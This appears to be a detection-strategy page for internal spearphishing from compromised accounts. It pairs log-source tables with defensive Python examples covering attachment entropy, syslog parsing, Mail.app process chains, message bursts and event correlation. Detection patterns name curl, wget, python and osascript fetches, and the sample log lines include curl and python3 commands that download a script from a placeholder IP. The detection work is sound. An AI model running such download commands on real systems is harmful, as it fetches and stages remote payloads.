Sequence of internal emails sent from a recently compromised user account (preceded by abnormal logon or device activity), with attachments or links leading to execution or credential harvesting. Defender observes internal mail delivery to peers with high-entropy attachments, followed by click events, process initiation, or credential prompts.
| Data Component | Name | Channel |
|---|---|---|
| Logon Session Creation (DC0067) | WinEventLog:Security | EventCode=4624 |
| User Account Authentication (DC0002) | WinEventLog:Security | EventCode=4625 |
| Logon Session Metadata (DC0088) | WinEventLog:Security | EventCode=4672 |
| Application Log Content (DC0038) | m365:unified | SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Field | Description |
|---|---|
| TimeWindow | Expected time between internal email and link execution or file dropper |
| UserContext | Baseline logon locations and device usage for sender accounts |
| AttachmentEntropyThreshold | Entropy value over which attachment is considered suspicious |
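The AttachmentEntropyThreshold element above is a per-byte Shannon entropy cut-off. The block below is an added example, not part of this detection strategy or any MITRE tooling: it computes the entropy of attachment bytes, applies an assumed threshold of 7.2 bits/byte, and shows the caveat a practitioner needs, namely that Office OOXML files are zip containers and legitimately sit near 8 bits/byte, so they should route to content inspection rather than be flagged on entropy alone. The sample attachments are constructed in the code; the lure names reuse the invoice/HR_policy heuristics named later on this page.

```python
import math
from collections import Counter

# AttachmentEntropyThreshold is left to the operator on the page; 7.2 bits/byte is an assumed starting point.
ATTACHMENT_ENTROPY_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 when all 256 byte values are equally common."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def attachment_kind(data: bytes) -> str:
    """Coarse type from magic bytes. Office OOXML files (docx, xlsx, pptx) are zip containers."""
    if data.startswith(b"PK\x03\x04"):
        return "zip-container"
    if data.startswith(b"MZ"):
        return "pe-executable"
    if data.startswith(b"%PDF"):
        return "pdf"
    return "other"


def score_attachment(name: str, data: bytes, threshold: float = ATTACHMENT_ENTROPY_THRESHOLD) -> dict:
    """Apply the entropy threshold and record why the verdict can or cannot be trusted on its own."""
    entropy = shannon_entropy(data)
    kind = attachment_kind(data)
    over = entropy >= threshold
    if over and kind == "zip-container":
        # Compressed containers sit near 8 bits/byte legitimately, so entropy alone is a weak
        # signal here; hand the file to macro/content inspection instead of alerting outright.
        verdict, reason = "inspect", "compressed container: high entropy is expected, check contents"
    elif over:
        verdict, reason = "suspicious", f"entropy {entropy:.2f} >= threshold {threshold}"
    else:
        verdict, reason = "clear", f"entropy {entropy:.2f} below threshold {threshold}"
    return {"name": name, "kind": kind, "entropy": round(entropy, 3), "verdict": verdict, "reason": reason}


def _pseudo_random(n: int) -> bytes:
    # Deterministic stand-in for encrypted or packed payload bytes (constructed sample data);
    # 7919 is odd, so the sequence cycles evenly through all 256 byte values.
    return bytes((i * 7919 + 13) % 256 for i in range(n))


# Constructed sample attachments, not real files.
SAMPLES = {
    "quarterly_numbers.txt": b"Please find the quarterly numbers attached. Regards, Finance\n" * 40,
    "HR_policy.docx": b"PK\x03\x04" + _pseudo_random(4096),
    "invoice_viewer.exe": b"MZ" + _pseudo_random(4096)[2:],
}


if __name__ == "__main__":
    for sample_name, sample_data in SAMPLES.items():
        print(score_attachment(sample_name, sample_data))
```

The "inspect" verdict is the point of the example: a threshold tuned low enough to catch packed executables will also fire on every docx in the mail flow unless container types are handled separately.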
Delivery of suspicious internal communication via mail clients (e.g., Thunderbird, Evolution) using compromised internal accounts. Sequence of: unexpected user activity + mail transfer logs + download or execution of attachments.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Application Log Content (DC0038) | Application:Mail | smtpd\[.*\]: .*from=.*@internaldomain.com to=.*@internaldomain.com |
| Network Traffic Content (DC0085) | linux:syslog | curl\|wget\|python .*http |
| Field | Description |
|---|---|
| SubjectLineAnomaly | Deviation from typical internal email subjects |
| AttachmentType | Executable types allowed or flagged by mail relay |
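The two channel patterns in the table above (the smtpd from/to match and the `curl|wget|python .*http` match) are what a collector has to apply to raw syslog text before any correlation can happen. The block below is an added example, not code from this page or from MITRE: it turns both patterns into compiled regular expressions that also capture the sender, recipient, tool and URL, and runs them over constructed syslog-style lines. The fetch pattern is widened to versioned interpreters such as `python3`, which the page's pattern does not cover; the domain `internaldomain.com` is taken from the page, and the log lines and hostnames are constructed.

```python
import re
from typing import List, Optional

INTERNAL_DOMAIN = "internaldomain.com"   # domain used in the page's channel pattern

# The page's smtpd pattern, with the brackets escaped and both addresses captured.
SMTPD_RE = re.compile(
    r"smtpd\[\d+\]: .*?from=<?(?P<sender>[^<>\s,]+@" + re.escape(INTERNAL_DOMAIN) + r")>?"
    r".*?to=<?(?P<rcpt>[^<>\s,]+@" + re.escape(INTERNAL_DOMAIN) + r")>?"
)
# The page's "curl|wget|python .*http" pattern, widened to versioned interpreters and capturing the URL.
FETCH_RE = re.compile(r"\b(?P<tool>curl|wget|python[0-9.]*)\b.*?(?P<url>https?://[^\s'\"]+)")
# Classic syslog header: "Mon DD HH:MM:SS host "
SYSLOG_HDR_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) ")


def parse_line(line: str) -> Optional[dict]:
    """Return a typed record for internal-to-internal mail or a network fetch, else None."""
    hdr = SYSLOG_HDR_RE.match(line)
    if not hdr:
        return None
    base = {"ts": hdr.group("ts"), "host": hdr.group("host")}
    m = SMTPD_RE.search(line)
    if m:
        return {**base, "kind": "internal_mail", "sender": m.group("sender"), "rcpt": m.group("rcpt")}
    m = FETCH_RE.search(line)
    if m:
        return {**base, "kind": "fetch", "tool": m.group("tool"), "url": m.group("url")}
    return None


def parse_lines(lines: List[str]) -> List[dict]:
    return [rec for rec in map(parse_line, lines) if rec]


# Constructed sample lines in syslog layout (hosts, queue ids and addresses are made up).
SAMPLE_LINES = [
    "Nov  3 09:58:12 mail01 postfix/smtpd[2231]: 4F2A1B: client=ws-17.internaldomain.com[10.1.2.17], "
    "from=<alice@internaldomain.com> to=<bob@internaldomain.com> proto=ESMTP",
    "Nov  3 09:58:40 mail01 postfix/smtpd[2231]: 4F2A1C: client=mx.partner.example[203.0.113.9], "
    "from=<news@partner.example> to=<bob@internaldomain.com> proto=ESMTP",
    "Nov  3 10:01:05 ws-22 bash[4411]: cmd=\"curl -s http://198.51.100.7/update.sh -o /tmp/u.sh\"",
    "Nov  3 10:02:30 ws-22 python3[4419]: python3 -c \"import urllib.request; "
    "urllib.request.urlopen('http://198.51.100.7/p')\"",
    "Nov  3 10:03:00 ws-09 sshd[900]: Accepted publickey for carol from 10.1.2.9 port 50022",
]


if __name__ == "__main__":
    for rec in parse_lines(SAMPLE_LINES):
        print(rec)
```

Note that the second sample line, external sender to an internal recipient, is deliberately not matched: the analytic is about internal-to-internal delivery, so the sender constraint in SMTPD_RE is what keeps ordinary inbound mail out of the candidate set.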
Abnormal Apple Mail use, including internal email relays followed by file execution or script events (e.g., attachments launched via Preview, a terminal or script interpreter spawned from Mail.app).
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | com.apple.mail.* exec.* |
| Network Traffic Content (DC0085) | macos:unifiedlog | curl\|osascript.*open location |
| Field | Description |
|---|---|
| ExecutionChainDepth | Number of child processes stemming from Mail.app |
| MailScriptFlag | Toggle on scripting detection within mail context |
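ExecutionChainDepth and MailScriptFlag both require walking the process tree back to Mail.app. The block below is an added example, not part of this page or any Apple or MITRE tooling: given exec events with pid, ppid and image path (constructed here to stand in for `macos:unifiedlog` process records), it computes how many hops below Mail each process sits and alerts when the depth reaches an assumed limit of 2 or, with the script flag on, when a scripting or download tool such as osascript or curl appears anywhere in a Mail-rooted chain. The Mail executable path is the one current macOS releases use; the depth limit, tool list and sample processes are assumptions.

```python
from typing import Dict, List, Optional

# Path of the Mail executable on current macOS releases.
MAIL_IMAGE = "/System/Applications/Mail.app/Contents/MacOS/Mail"
EXECUTION_CHAIN_DEPTH = 2   # assumed tunable: alert at this many hops or more below Mail
MAIL_SCRIPT_FLAG = True     # assumed tunable: alert on any scripting/download tool in a Mail-rooted chain
SCRIPT_TOOLS = {"osascript", "sh", "zsh", "bash", "python3", "curl"}


def index_by_pid(events: List[dict]) -> Dict[int, dict]:
    return {e["pid"]: e for e in events}


def depth_below_mail(pid: int, by_pid: Dict[int, dict]) -> Optional[int]:
    """Hops from this process up to the nearest Mail ancestor (Mail itself is 0); None if no Mail ancestor."""
    depth = 0
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:   # the seen-set guards against cyclic ppid data
        seen.add(cur["pid"])
        if cur["image"] == MAIL_IMAGE:
            return depth
        depth += 1
        cur = by_pid.get(cur["ppid"])
    return None


def evaluate(events: List[dict], max_depth: int = EXECUTION_CHAIN_DEPTH,
             script_flag: bool = MAIL_SCRIPT_FLAG) -> List[dict]:
    """Flag processes under Mail.app by chain depth and, optionally, by scripting-tool name."""
    by_pid = index_by_pid(events)
    alerts = []
    for e in events:
        if e["image"] == MAIL_IMAGE:
            continue
        depth = depth_below_mail(e["pid"], by_pid)
        if depth is None:
            continue
        name = e["image"].rsplit("/", 1)[-1]
        reasons = []
        if depth >= max_depth:
            reasons.append(f"chain depth {depth} >= {max_depth}")
        if script_flag and name in SCRIPT_TOOLS:
            reasons.append(f"scripting tool {name} spawned under Mail")
        if reasons:
            alerts.append({"pid": e["pid"], "image": name, "depth": depth, "reasons": reasons})
    return alerts


# Constructed process records (not captured from a real system).
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": "/sbin/launchd"},
    {"pid": 400, "ppid": 1, "image": MAIL_IMAGE},
    {"pid": 410, "ppid": 400, "image": "/System/Applications/Preview.app/Contents/MacOS/Preview"},
    {"pid": 420, "ppid": 400, "image": "/bin/sh"},
    {"pid": 421, "ppid": 420, "image": "/usr/bin/curl"},
    {"pid": 430, "ppid": 420, "image": "/usr/bin/osascript"},
    {"pid": 500, "ppid": 1, "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
]


if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

Preview opened directly from Mail (pid 410) is depth 1 and not a scripting tool, so it stays quiet, which is the behaviour the depth element is meant to preserve: attachment viewing is normal, a shell under Mail is not.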
Internal spearphishing via SaaS applications (e.g., Slack, Teams, Gmail): message sent from compromised user with attachment or URL, followed by click and credential access behavior.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | saas:slack | file_upload, message_send, message_click |
| Field | Description |
|---|---|
| UserAnomalyThreshold | Volume or timing of messages sent after compromise |
| FileRiskScoring | Whether SaaS DLP assigns risk scores to attachments |
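UserAnomalyThreshold covers both volume and timing of messages sent after compromise. The block below is an added example, not code from this page or from any SaaS vendor: for one user it compares today's `message_send` count against the user's own daily baseline as a z-score, and separately sweeps a five-minute window over the sends to find how many distinct recipients were messaged in a burst, since a compromised account fanning a lure out to many peers in a few minutes is the timing signature described above. The baseline counts, window, thresholds and event records are constructed assumptions.

```python
import statistics
from datetime import datetime, timedelta
from typing import List

# Assumed tunables standing in for UserAnomalyThreshold; the page leaves the values to the operator.
VOLUME_ZSCORE_THRESHOLD = 3.0          # today's send count vs. the user's daily baseline
BURST_WINDOW = timedelta(minutes=5)    # timing: distinct recipients messaged inside one window
BURST_MIN_RECIPIENTS = 10


def volume_zscore(today_count: int, baseline_counts: List[int]) -> float:
    """How many standard deviations today's volume sits above the user's own history."""
    mean = statistics.mean(baseline_counts)
    sd = statistics.pstdev(baseline_counts) or 1.0   # a perfectly flat baseline would otherwise divide by zero
    return (today_count - mean) / sd


def max_recipient_burst(sends: List[dict], window: timedelta = BURST_WINDOW) -> int:
    """Largest number of distinct recipients messaged within any single window (two-pointer sweep)."""
    ordered = sorted(sends, key=lambda s: s["ts"])
    best, start = 0, 0
    for end in range(len(ordered)):
        while ordered[end]["ts"] - ordered[start]["ts"] > window:
            start += 1
        best = max(best, len({s["rcpt"] for s in ordered[start:end + 1]}))
    return best


def evaluate_user(user: str, sends: List[dict], baseline_counts: List[int],
                  z_threshold: float = VOLUME_ZSCORE_THRESHOLD,
                  window: timedelta = BURST_WINDOW,
                  min_recipients: int = BURST_MIN_RECIPIENTS) -> dict:
    """Combine the volume and timing checks into one verdict for the sender account."""
    z = volume_zscore(len(sends), baseline_counts)
    burst = max_recipient_burst(sends, window)
    return {
        "user": user,
        "sent_today": len(sends),
        "zscore": round(z, 2),
        "max_burst_recipients": burst,
        "anomalous": z >= z_threshold or burst >= min_recipients,
    }


# Constructed sample data: seven prior days of send counts, then today's events for one user.
BASELINE_DAILY_SENDS = [12, 15, 9, 14, 11, 13, 10]
T0 = datetime(2024, 5, 6, 9, 0, 0)
SAMPLE_SENDS = [
    {"ts": T0 + timedelta(seconds=8 * i), "rcpt": f"user{i:02d}", "action": "message_send"} for i in range(30)
] + [
    {"ts": T0 + timedelta(hours=2, minutes=m), "rcpt": "bob", "action": "message_send"} for m in range(3)
]


if __name__ == "__main__":
    print(evaluate_user("alice", SAMPLE_SENDS, BASELINE_DAILY_SENDS))
```

The two checks fail in different ways: a patient attacker who sends a few lures per hour stays under the burst test but still raises the daily volume, while a short blast of one-to-one messages may not move a noisy user's daily total much yet lights up the burst test, so the verdict is their disjunction.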
Outlook or Word used to forward suspicious internal attachments with macro content. Defender observes attachment forwarding, auto-opening behaviors, or macro prompt interactions.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | SendOnBehalf, MessageSend, AttachmentPreviewed |
| Command Execution (DC0064) | WinEventLog:Security | EventCode=4104 |
| Field | Description |
|---|---|
| MacroExecutionWindow | Timing between mail open and macro invocation |
| AttachmentNameHeuristics | Patterns of known internal spearphishing lures (e.g., invoice, HR_policy) |
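Every analytic on this page is a sequence: an anomalous logon taints an account, mail from that account to peers becomes a candidate lure, and execution or a credential prompt on the recipient's side within TimeWindow completes the chain; the Office analytic adds MacroExecutionWindow, the gap between the attachment being opened and the macro or script running. The block below is an added example, not MITRE's or any vendor's code, that implements this correlation once over a normalized event stream so it serves the Windows analytic at the top of the page and the Office analytic above. The UserContext baseline, the window sizes (2 hours for how long a bad logon taints outbound mail, 15 minutes for delivery to execution) and all events are constructed assumptions; the event types are plain labels for the channels in the tables, not real log field names.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Tunables mirroring the page's mutable elements; these values are assumptions.
SUSPECT_WINDOW = timedelta(hours=2)    # how long an anomalous logon taints the account's outbound mail
TIME_WINDOW = timedelta(minutes=15)    # TimeWindow: lure delivery -> execution / credential prompt
EXECUTION_TYPES = {"process_creation", "script_block", "credential_prompt"}

# UserContext: baseline (source address, device) pairs per sender account (constructed).
USER_BASELINE: Dict[str, Set[Tuple[str, str]]] = {
    "alice": {("10.1.2.11", "WS-ALICE")},
    "dave": {("10.1.2.14", "WS-DAVE")},
}


def parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def correlate(events: List[dict], baseline=USER_BASELINE,
              suspect_window: timedelta = SUSPECT_WINDOW,
              time_window: timedelta = TIME_WINDOW) -> List[dict]:
    """Chain anomalous logon -> internal send -> recipient execution; one alert per lure/execution pair."""
    suspects: Dict[str, datetime] = {}   # sender -> time of the anomalous logon
    lures: List[dict] = []               # internal messages sent while the sender is a suspect
    alerts: List[dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, kind = parse_ts(ev["ts"]), ev["type"]
        if kind == "logon":
            # Stage 1: logon from a source/device pair outside the account's baseline.
            if (ev["src"], ev["device"]) not in baseline.get(ev["user"], set()):
                suspects[ev["user"]] = ts
        elif kind == "mail_send":
            # Stage 2: internal mail from a tainted account is a candidate lure.
            since = suspects.get(ev["user"])
            if since is not None and ts - since <= suspect_window:
                lures.append({"sender": ev["user"], "rcpt": ev["rcpt"], "sent": ts,
                              "attachment": ev.get("attachment"), "opened": None})
        elif kind == "attachment_opened":
            # Record the open time so MacroExecutionWindow can be measured.
            for lure in lures:
                if lure["rcpt"] == ev["user"] and lure["opened"] is None and ts >= lure["sent"]:
                    lure["opened"] = ts
        elif kind in EXECUTION_TYPES:
            # Stage 3: execution or credential prompt on the recipient's side inside TimeWindow.
            for lure in lures:
                if lure["rcpt"] == ev["user"] and timedelta(0) <= ts - lure["sent"] <= time_window:
                    alerts.append({
                        "sender": lure["sender"], "rcpt": lure["rcpt"], "attachment": lure["attachment"],
                        "exec_type": kind, "host": ev.get("host"),
                        "seconds_to_exec": (ts - lure["sent"]).total_seconds(),
                        "open_to_exec_seconds": (ts - lure["opened"]).total_seconds() if lure["opened"] else None,
                    })
    return alerts


# Constructed sample events (not real telemetry): alice's account is used from an unknown device.
SAMPLE_EVENTS = [
    {"ts": "2024-05-06T08:02:10Z", "type": "logon", "user": "alice", "src": "203.0.113.5", "device": "UNKNOWN-LAPTOP"},
    {"ts": "2024-05-06T08:05:00Z", "type": "mail_send", "user": "alice", "rcpt": "bob", "attachment": "invoice.docm"},
    {"ts": "2024-05-06T08:05:02Z", "type": "mail_send", "user": "alice", "rcpt": "carol", "attachment": "invoice.docm"},
    {"ts": "2024-05-06T08:09:30Z", "type": "attachment_opened", "user": "bob"},
    {"ts": "2024-05-06T08:09:45Z", "type": "script_block", "user": "bob", "host": "WS-BOB"},
    {"ts": "2024-05-06T09:40:00Z", "type": "logon", "user": "dave", "src": "10.1.2.14", "device": "WS-DAVE"},
    {"ts": "2024-05-06T09:41:00Z", "type": "mail_send", "user": "dave", "rcpt": "erin", "attachment": "minutes.docx"},
    {"ts": "2024-05-06T09:42:00Z", "type": "script_block", "user": "erin", "host": "WS-ERIN"},
]


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Dave's mail to erin is followed by a script block too, but his logon matched the UserContext baseline, so no lure is ever recorded for him and the sequence does not alert; carol received the same lure as bob but never executed anything, so she generates no alert either. That is the role of the first stage: without the logon anomaly, ordinary internal mail followed by ordinary scripting would alert constantly.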